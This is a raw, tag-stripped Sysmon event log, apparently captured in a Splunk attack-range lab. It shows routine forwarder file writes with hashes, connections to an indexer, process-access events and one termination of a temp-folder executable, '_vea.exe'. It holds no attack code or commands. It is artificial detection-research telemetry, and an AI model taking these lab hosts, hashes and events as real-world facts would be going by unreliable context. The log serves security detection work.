354300x8000000000000000220789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:22.648{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51607-false10.0.1.12-8000- 23542300x8000000000000000220788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:25.416{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B68B7DD61315001E45626EA05573761,SHA256=0124329C7B4363949001A75443B52020CD7A2F5546154FA65C42F8A91C6903E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:25.243{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E4887B408BE9141EF443707E448D686,SHA256=782830A4CD8FA427B1FCAD01808D9E85D0EBF2286081BBE6292937EF21AB21FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:26.432{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B7F0C22F6282FA6DA36371EAAB1A3C6,SHA256=4B5A997BDEF95313B6EAB105677B9610082A3B8B8326EFBFC6CC5867B6DED637,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:26.902{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:26.902{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000296886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:23.895{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local137netbios-nsfalse10.0.1.15WIN-HOST-TCONTR137netbios-ns 23542300x8000000000000000296885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:26.287{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37F82CFABE74C38BD9C8D7F2E1F4B914,SHA256=314F81B69C1AC8E11098B0CC1AF393E2565BAF305DA5D1000167EF7E631AF855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:26.008{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000296883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:26.008{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:26.008{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF9372f2.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:27.557{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BC05C23D0966D9E808A3B917FFB393A,SHA256=F2AFD511F34B20551E8D52547C25125E0EF77D0A68E3F257DB2C37F1B380564E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:27.355{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=449C63C176CE46591C208BFDC599435E,SHA256=39B15CC4EF6D3B33FACA00BB1FC25A2F2398E57E1D91AE51E97A7903390692AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:28.573{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34F4B679143CC0967CD4F992167F63B4,SHA256=1AEC850DF1362D03520585DABB3D5C9814A05BC9F24670E592370CD28DE1B575,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:26.498{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49393-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:28.371{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=469E885EF216EDF30CD7867CD8701474,SHA256=1D659E8CD901419B5DB2B8ED3FF4508338CDA65EECC32A962939C9257461380A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:29.386{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57F45A7E6166C9365B043BDDB82F472F,SHA256=75E525E62E4FD420E7CD0DB88F07025E8090348F60C85C693CF6CDBE3850BBCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:29.588{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84BA0536C9C7549370A4FB5802CCFF37,SHA256=5E9F4E205B7B3D3D6C65DCB068BF69A49C27D51DFA04E81261EBB58B58E58C47,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000296892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:29.004{C8EA50B7-16BD-6216-0A07-000000003802}7156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 354300x8000000000000000220796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:28.633{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51608-false10.0.1.12-8000- 23542300x8000000000000000220795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:30.604{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F95A55A7EE5A6D157B2252DEEA112E02,SHA256=97C6FF6EB537CE0EE9B32704B661B05A7AA6DA49028FE218307AF0EE80C52E12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:30.386{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29646E30AC33962D54E5F741BA7355FA,SHA256=ED2B78D086E3627833011669349C9A3B4037EA95B8C2397989D6C6C8D711C45E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:30.324{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=98C2B1DAD23689FECA3D26D336FEDBDD,SHA256=8D2A71C236F78A26FE963BB363D6D4B53D9424D2CC1A2872C40339E733F9E9F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:30.432{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=167DEA8374028D5EADF43685CB6DDE42,SHA256=FA9414B1AA63CF6C0FBE010A6FCC2C25C32543370CC685E40C3A8E3F16D36EBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:31.888{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-156MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:31.619{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02AE4F56DB5F973F955D16B6BA132CFA,SHA256=EAAE2901F351C1D0B7CB194043A310E6AAEB962B77CEAD9D6E2E130F82FB5CD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:31.423{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F1A3C42899E6ACC08F622D5ABA171EB,SHA256=D5B43AD93502C387A341420FB9C54E7DF36A68AC5CE05582A90171BAB18611A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:32.890{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-157MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:32.624{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C0C643AB2A09C348C826DD568DE8AD6,SHA256=B66F144D54D3B327BA013AAACCA06AE2C70978533981AA0F12F92EDE685EC3C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:32.439{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C59A9F8C4FD9F09699CE134F266DDD6A,SHA256=51F24F14EA5B7BF3D1F3233242A33A5019257FEEC0D39ECB4E18F9CE8E058D7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:33.625{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE90175C750412D15EF3D926D16C90C2,SHA256=A4741C6D899A1194583B6130EF9336562D7B456D6AC353A0930BC066F6E1F79F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:33.538{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=16F024D7CA54963FD9E4AEAB69900132,SHA256=72224A4EBBC5929BF36A1667AD98244F938E94C00DAE1526DCA8DDD3FF1D4548,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:31.512{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49395-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:33.454{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CF5C3AB6F0629507DA4F6F192FCC403,SHA256=0B326D4447F4649D57FE67326B0A06F18BCED0E0A81AFBCB18063F3BD4C38737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:34.484{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13A9EBCDFE8D6FD3E92D274CEBBA1DC1,SHA256=48FE80F97212F17C60DC993576C397FADC364B4CBCFB3137E2583FB6003B795C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:34.641{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCF47E279128D3B0DD07E2E1F4F82D30,SHA256=EB5D4919C858E6133B29F0AA84F71DFBE8CBCB7A555B7ED2E8A631B692A7912B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:35.656{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F2ADE245745547707C9E8059170FF92,SHA256=57FEEEC45957608F7D577D69C42AD9799204DEE47C0FF497C5C143E328C0CA8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:35.521{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AF980C544B2B54BCE776677BB6EB6FE,SHA256=59C13DD8F82577081EE4FB52D87E458BE44A520A77590500CE9AFC3065051B8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:36.656{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=567FB7C64AEB3E59E202F366B5E7C761,SHA256=B56E19384C71DB615B3CEDFAD73D871528694A4C6EE6CDF8CF30832B3EDF0A04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:36.536{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D63B904662E7D5B1F3685B4244E94F7F,SHA256=7C8E1A59BA7C8F5695F095474460E748ADDA53252094BFB138D4B7BCC3F4A7DF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:33.638{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51609-false10.0.1.12-8000- 23542300x8000000000000000220806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:37.672{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AA8590CBADD77A4B3862C5EB54B032E,SHA256=96B919D98EE0D0B6BADDDC9DD7BDD5C81D3B7866E7883569E53F1884EECC9C5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:37.553{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D071A314E6C2BC63C8470EF2295D536,SHA256=DE88F594C857251897A8C85F2ABD4DF54B5BD288C8EAEA4BE61E1B0439652011,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:36.695{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49396-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:38.568{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DD62DFEDB36C0BD8538F7E29DCDCEA4,SHA256=5002895CF836A17F885DD64BC4B7DC51AA82733EE7CDE86E0C23165FA44166E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:38.672{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=959DCEFFA36ADBE084B4F34AF3B4852E,SHA256=B81DED8F052933FDB8C27DBB3DC1C915D207704D12FCEAE9AA644CD86B7F27AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296907Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:39.603{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29E06AE08CEE49D74070BC60207A1118,SHA256=9824F8AE1A915394D59D2382201844B56CDB9BCCAAA1175F94EB976BE8A1A4DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:39.688{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF74494A1A370C572E409D6C1956FCC8,SHA256=FF9E517F2078B46B7FB13B0944BFD6CD116443034861A4719E293F589FFFCC9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:40.703{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 